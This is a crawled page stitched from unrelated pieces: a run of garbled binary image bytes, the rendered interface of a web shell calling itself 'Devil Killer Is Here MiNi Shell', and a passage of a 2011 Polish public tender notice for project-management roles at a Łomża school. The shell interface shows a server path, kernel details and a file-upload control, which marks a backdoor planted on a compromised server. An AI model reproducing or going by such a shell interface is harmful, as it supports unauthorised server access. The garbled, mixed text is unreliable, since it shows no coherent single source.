JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111201/406630-N-2011.html

<p class="kh_header"><b>Łomża: Pełnienie funkcji kierownictwa projektu pt. Nowe umiejętności szansą na lepszą pracę, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet IX -Rozwój wykształcenia i kompetencji w regionach - Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego</b><br>
<b>Numer ogłoszenia: 406630 - 2011; data zamieszczenia: 01.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Mechanicznych i Ogólnokształcących Nr 5 , ul. Przykoszarowa 22, 18-400 Łomża, woj. podlaskie, tel. 0-86 2186239, faks 0-86 2186239.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsmio.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji kierownictwa projektu pt. Nowe umiejętności szansą na lepszą pracę, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet IX -Rozwój wykształcenia i kompetencji w regionach - Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Pełnienie funkcji kierownika projektu, asystenta kierownika projektu, koordynatora dydaktycznego, koordynatora do spraw projektu pt. Nowe umiejętności szansą na lepszą pracę w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego. Przedmiot zamówienia podlega podziałowi na n/w części: Część nr 1 -Pełnienie funkcji kierownika projektu pt. Nowe umiejętności szansą na lepszą pracę w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego; Część nr 2 - Pełnienie funkcji asystenta kierownika pt. Nowe umiejętności szansą na lepszą pracę w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego; Część nr 3 - Pełnienie funkcji koordynatora dydaktycznego projektu pt. Nowe umiejętności szansą na lepszą pracę w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego; Część nr 4 - Pełnienie funkcji koordynatora do spraw zakupów projektu pt. Nowe umiejętności szansą na lepszą pracę w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Ocena w/w warunku nastąpi w oparciu o wykaz wykonanych usług. Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże wykonanie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, co najmniej 1 usługi związanej z pełnieniem podobnych funkcji w projektach współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki oraz dołączy dokumenty wystawione przez podmiot realizujący projekt, potwierdzające pełnienie powierzonej funkcji oraz, że usługi te zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy oraz spełnienia nw. Warunki udziału w postępowaniu, określone w oparciu o art. 22 ust. 1 ustawy, dotyczące: 1. Posiadania uprawnień do wykonywania określonej działalności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 2. Posiadania wiedzy i doświadczenia, tj.: Warunek posiadania wiedzy i doświadczenia zostanie uznany za spełniony, jeśli Wykonawca wykaże wykonanie w sposób należyty w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, co najmniej 1 usługi związanej z pełnieniem podobnych funkcji w projektach współfinansowanych ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki oraz dołączy dokumenty wystawione przez podmiot realizujący projekt, potwierdzające pełnienie powierzonej funkcji oraz, że usługi te zostały wykonane należycie. 3. Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.: Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, jeśli Wykonawca wykaże, iż osoby, uczestniczące w wykonaniu poszczególnych części zamówienia spełniają minimalne wymagania odnośnie doświadczenia, kwalifikacji i wykształcenia: CZĘŚĆ 1: - posiada doświadczenie przy realizacji projektów edukacyjnych na podobnym stanowisku w ramach POKL w wartości powyżej 200 000 zł wystawione przez podmiot realizujący projekt, a projekt został zrealizowany i prawidłowo rozliczony; - wykształcenie wyższe techniczne (potwierdzone dyplomem lub odpisem dyplomu ukończenia studiów); - posiada co najmniej 3 -letni staż pracy pedagogicznej w szkole ponadgimnazjalnej zawodowej (potwierdzony zaświadczeniem o stażu pracy w szkole ponadgimnazjalnej); - wiedza w zakresie kwalifikowalności wydatków dotyczących realizacji projektów unijnych realizowanych w ramach POKL wg zasad obowiązujących od dnia 1.01.2011 r. (potwierdzona zaświadczeniem o ukończeniu szkolenia lub kursu); - zna zasady rozliczania projektów w ramach PO KL (potwierdzone zaświadczeniem o ukończeniu szkolenia lub kursu); CZĘŚĆ 2: - posiada doświadczenie przy realizacji projektów edukacyjnych na podobnym stanowisku w ramach POKL w wartości powyżej 150 000 zł wystawione przez podmiot realizujący projekt, a projekt został zrealizowany i prawidłowo rozliczony; - wykształcenie wyższe techniczne (potwierdzone dyplomem lub odpisem dyplomu ukończenia studiów); - posiada co najmniej 3 -letni staż pracy pedagogicznej w szkole ponadgimnazjalnej zawodowej (potwierdzony zaświadczeniem o stażu pracy w szkole ponadgimnazjalnej); CZĘŚĆ 3: - posiada doświadczenie przy realizacji projektów edukacyjnych na podobnym stanowisku w ramach POKL w liczbie beneficjentów powyżej 80 osób, a projekt został zrealizowany i prawidłowo rozliczony; - wykształcenie wyższe (potwierdzone dyplomem lub odpisem dyplomu ukończenia studiów); - posiada wiedzę z zakresu prowadzenia hospitacji zajęć edukacyjnych (potwierdzone zaświadczeniem o ukończeniu szkolenia lub kursu); CZĘŚĆ 4: - posiada doświadczenie przy realizacji projektów edukacyjnych na podobnym stanowisku w ramach POKL w wartości powyżej 150 000 zł wystawione przez podmiot realizujący projekt, a projekt został zrealizowany i prawidłowo rozliczony; - wykształcenie wyższe techniczne (potwierdzone dyplomem lub odpisem dyplomu ukończenia studiów); - posiada co najmniej 3 -letni staż pracy pedagogicznej w szkole ponadgimnazjalnej zawodowej (potwierdzony zaświadczeniem o stażu pracy w szkole ponadgimnazjalnej);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, przewiduje również następujące możliwości dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia okoliczności wymienionych poniżej:
- zmiana terminów realizacji umowy 
- z przyczyn leżących po stronie Zamawiającego lub Instytucji Pośredniczącej albo z przyczyn losowych,
- gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.efs.zsmio.pl/lepszapraca/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Mechanicznych i Ogólnokształcących Nr 5, ul. Przykoszarowa 22, 18-400 Łomża.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2011 godzina 10:30, miejsce: Sekretariat Zespołu Szkół Mechanicznych i Ogólnokształcących Nr 5 w Łomży ul. Przykoszarowa 22, 18-400 Łomża.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Nowe umiejętności szansą na lepszą pracę, realizowany w ramach Programu Operacyjnego Kapitał Ludzki współfinansowany ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji kierownika projektu pt. Nowe umiejętności szansą na lepszą pracę w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i prowadzenie Biura projektu - współpraca z dyrektorem szkoły i księgową zatrudnioną do rozliczeń w ramach projektu. Nadzór na promocją projektu i rekrutacją beneficjentów ostatecznych. Utworzenie i aktualizowanie zawartości strony internetowej projektu. Konserwacja strony internetowej projektu. Dbanie o poprawny wygląd materiałów znajdujących się na stronie internetowej projektu. Bieżące zamieszczanie informacji; Kontrola oraz nadzór merytoryczny nad realizacją projektu zgodnie z wymogami POKL oraz obowiązującymi przepisami krajowymi, w oparciu o Umowę o dofinansowanie wraz z załącznikami. Zapewnienie wysokiego poziomu realizacji projektu w ujęciu organizacyjnym i merytorycznym; Opracowywanie instrukcji i regulaminów dotyczących realizacji projektu; Kontrola i weryfikacja programów edukacyjnych dla szkoleń realizowanych w ramach projektu; Monitorowanie systematyczności i efektywności realizacji projektu; Odpowiedzialność za przygotowywanie i opracowanie sprawozdań z realizacji Projektu. Kontrola terminowej realizacji zadań wynikających z harmonogramu realizacji oraz budżetu; Informowanie na bieżąco o zaistniałych problemach i propozycjach ich rozwiązania, Terminowe sporządzanie i przesyłanie wniosków o płatność, sprawozdań i innych dokumentów, Kontrola dokumentacji pod kątem jej oznaczania zgodnie z wytycznymi PO KL, Nadzór procesu wyłaniania kadry dydaktycznej, firm szkoleniowych do realizacji Projektu. Prowadzenie nadzoru nad wyborem materiałów zakupywanych w ramach projektu dla beneficjentów i pomocy dydaktycznych; Nadzór nad rozliczaniem wykładowców w ramach prowadzonych zajęć szkoleniowych, rozliczanie w ramach wolontariatu. Współpraca z księgową projektu przy opracowywaniu wniosków o płatność do instytucji zarządzającej; w zakresie prawidłowości wydatkowania środków finansowych oraz prowadzonych rozliczeń Projektu Nadzór nad prawidłowością wydatkowania środków finansowych przeznaczonych na realizację Projektu. Koordynacja prac kierownictwa Projektu, kontrola i rozliczanie czasu pracy osób zaangażowanych w realizację projektu; Bezpośredni kontakt z realizatorami i odbiorcami projektu Prowadzenie całościowej dokumentacji projektu: rejestru umów; dokumentację finansową, inne niezbędne do realizacji projektu. Zbieranie i archiwizacja dokumentów; Przestrzeganie i nadzorowanie przetwarzania danych osobowych uczestników projektu zgodnie z Ustawą o ochronie danych osobowych; Uczestniczenie we wszystkich czynnościach kontrolnych związanych z projektem po jego zakończeniu na każde wezwanie Zamawiającego. Kontakty z Wojewódzkim Urzędem Marszałkowski w Białymstoku i z Urzędem Miasta Łomża; Wykonywanie zleconych zadań w siedzibie Zamawiającego (biurze projektu) przez cały okres umowy w terminie umożliwiającym bezproblemową pracę i realizację projektu; Dokonanie rozliczenia końcowego projektu zgodnie z wytycznymi dotyczącymi realizacji projektu w ramach POKL i obowiązującymi przepisami; Śledzenie dokumentów, wytycznych, które w trakcie realizacji projektu mogą ulec zmianie w celu zapewnienia zgodności projektu z wytycznymi jak również prawodawstwem polskim i UE.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji asystenta kierownika pt. Nowe umiejętności szansą na lepszą pracę w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Współpraca z koordynatorem ds. zakupów i szkoleń w zakresie analizy rynku i przygotowywanie zapytań ofertowych na zakup materiałów do projektu; Dokonywanie wyborów odnośnie materiałów zakupywanych w ramach projektu dla beneficjentów i pomocy dydaktycznych potrzebnych do prowadzenia szkoleń; Koordynacja w procesie wyboru firm świadczących usługi i dostarczających materiały dydaktyczne na rzecz projektu - organizowanie prac komisji do wyboru ofert; Kontrola udzielania zamówień o wartości szacunkowej poniżej 14 000 euro zgodnie z ustawą o finansach publicznych i wytycznymi PO KL, Nadzorowanie prac związanych z umieszczeniem elementów informacyjno promocyjnych w miejscach realizacji projektu (np. biuro, sale dydaktyczne, korytarz, budynek); Koordynacja działań według harmonogramu; Współpraca z kierownikiem w zakresie monitoringu realizacji projektu; nadzoru nad rozliczeniami i sprawozdawczością finansową i rozliczaniem wykładowców, firm szkoleniowych z zajęć realizowanych w ramach projektu na rzecz BO. Czuwanie nad prawidłową realizacją projektu, w tym zgodności realizacji zadań z zapisami we wniosku o dofinansowanie projektu i jego harmonogramem; Bezpośredni kontakt z realizatorami i odbiorcami projektu - dbanie o zapewnienie wsparcia pomocniczego dla BO (materiały i poczęstunek) - Opieka nad młodzieżą dojeżdżającą oczekującą na zajęcia popołudniowe; Nadzór nad właściwym gospodarowanie cateringiem; Korelowanie zamówień cateringu na poszczególne dni w zależności od harmonogramu szkoleń. Organizację wyjazdów edukacyjnych; Prowadzenie dokumentacji związanej z realizacją projektu, wskazanej przez Kierownika Projektu. Zbieranie i archiwizacja dokumentów; Ewaluacja wskaźników projektu - sprawozdawczość - archiwizacja dokumentacji projektowej; Współpraca z koordynatorem dydaktycznym w zakresie zgodności realizacji projektu z planem merytorycznym (monitoring dokumentacji szkoleniowej: harmonogramy szkoleń, sprawdzenie dokumentacji warsztatów, list obecności) Nadzór dydaktyczny nad realizacją poszczególnych zadań w projekcie; prowadzenie hospitacji, przygotowanie i analiza ankiet ewaluacyjnych, wnioskowanie działań korygujących; Kontrola i weryfikacja programów edukacyjnych dla szkoleń realizowanych w ramach projektu; Zastępowanie Kierownika projektu w razie potrzeby jako osoba do kontaktów roboczych; Pozyskanie pracodawców do współpracy w realizacji praktyk; Wyłonienie firm, które przyjmą uczniów na praktyki w ramach projektu; Przygotowanie umów z pracodawcami; Nadzór nad podpisywaniem umów i porozumień z pracodawcami odnośnie praktyk - dostarczanie ich do pracodawców; Nadzór i kontrola praktyk w zakładach pracy; Przygotowanie ankiety podsumowującej odbyte praktyki i ich analiza; Współpraca z pozostałym personelem projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów projektu Wykonywanie innych prac zleconych przez kierownika projektu związanych z prawidłową jego realizacją; Wsparcie procesu zarządzania; Wykonywanie zleconych zadań w siedzibie Zamawiającego (biurze projektu) przez cały okres umowy w terminie umożliwiającym bezproblemową pracę i realizację projektu;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie funkcji koordynatora dydaktycznego projektu pt. Nowe umiejętności szansą na lepszą pracę w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Współodpowiedzialność za prawidłowe przygotowanie i przeprowadzenie promocji w środowisku szkolnym oraz nabór beneficjentów ostatecznych do Projektu Koordynacja w procesie rekrutacji beneficjentów ostatecznych- przygotowanie regulaminu naboru beneficjentów, organizowanie prac komisji rekrutacyjnej. Gromadzenie i przetwarzanie danych osobowych uczestników projektu w formularzu PEFS POKL Współpraca z kierownikiem projektu przy opracowywaniu wniosków o płatność do instytucji zarządzającej w zakresie prawidłowości części merytorycznej wniosku - postęp rzeczowy, załącznik nr 2 do wniosku. Koordynacja w procesie rekrutacji beneficjentów ostatecznych; Wykonanie harmonogramu realizacji zajęć Projektu. Nadzór dydaktyczny nad realizacją poszczególnych zadań w projekcie - prowadzenie hospitacji, analizę dokumentacji zajęć, przygotowanie i analiza ankiet ewaluacyjnych, wnioskowanie działań korygujących; Zgodność realizacji projektu z planem merytorycznym (monitoring dokumentacji szkoleniowej: harmonogramy szkoleń, sprawdzenie dokumentacji warsztatów, list obecności) Monitoring udziału beneficjentów w zajęciach realizowanych w ramach projektu; Sprawowanie nadzoru nad frekwencją na zajęciach, sporządzanie zestawień frekwencji na podstawie list obecności Współpraca z personelem projektu na poziomie zarządzającym i zadaniowym; Bezpośredni kontakt z realizatorami i odbiorcami projektu Współpraca z kierownikiem w zakresie planowania realizacji projektu, monitoringu działań szkoleniowych; Wykonywanie innych prac zleconych przez kierownika projektu związanych z prawidłową realizacją Projektu. Wykonywanie zleconych zadań w siedzibie Zamawiającego (biurze projektu) przez cały okres umowy w terminie umożliwiającym bezproblemową pracę i realizację projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pełnienie funkcji koordynatora do spraw zakupów projektu pt. Nowe umiejętności szansą na lepszą pracę w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie analizy rynku o materiały zakupywane w ramach realizacji projektu Przygotowywanie i gromadzenie zapytań ofertowych firm świadczących usługi na rzecz Projektu przygotowanych przez koordynatora merytoryczno finansowego; Udział w pracach komisji prac komisji do wyboru ofert; Dokonywanie zakupów i dbanie o dostarczenie do budynku szkoły materiałów wybranych przez komisję lub monitorowanie ich dostarczenia Organizowanie i monitorowanie zapewnienia wsparcia pomocniczego dla BO, powielanie materiałów szkoleniowych dla BO przygotowane przez prowadzących, kompletowanie materiałów dla uczniów i ich przekazywanie; Przygotowywanie sal dydaktycznych; Wykonywanie innych prac zleconych przez kierownika projektu związanych z prawidłową jego realizacją Koszty związane z kontaktami z firmami dostarczającymi towary i usługi na rzecz projektu pokrywa Koordynator Wykonywanie zleconych zadań w 